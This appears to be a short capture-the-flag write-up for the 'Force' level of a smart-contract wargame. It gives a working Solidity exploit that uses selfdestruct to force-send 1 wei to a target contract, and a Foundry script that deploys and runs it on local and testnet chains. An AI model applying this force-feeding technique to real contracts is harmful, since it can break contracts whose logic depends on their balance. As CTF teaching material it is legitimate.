The exploit uses selfdestruct to force funds to be sent to the contract.
Create an attack contract that contains funds (1 wei) which is then force sent to the target contract using selfdestruct.
Submit instance... 🥳
Last updated
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Force {/*
MEOW ?
/\_/\ /
____/ o o \
/~____ =ø= /
(______)__m_m)
*/}make anvil-exploit-level-7
<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>make holesky-exploit-level-7
<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
// ================================================================
// │ LEVEL 7 - FORCE │
// ================================================================
contract Selfdestruct {
function attack(address _targetContractAddress) public payable {
selfdestruct(payable(_targetContractAddress));
}
}// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;
import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";
import {Selfdestruct} from "../src/Level7.sol";
// ================================================================
// │ LEVEL 7 - FORCE │
// ================================================================
contract Exploit is Script, HelperFunctions {
function run() public {
address targetContractAddress = getInstanceAddress();
vm.startBroadcast();
Selfdestruct targetContract = new Selfdestruct();
targetContract.attack{value: 1 wei}(targetContractAddress);
vm.stopBroadcast();
}
}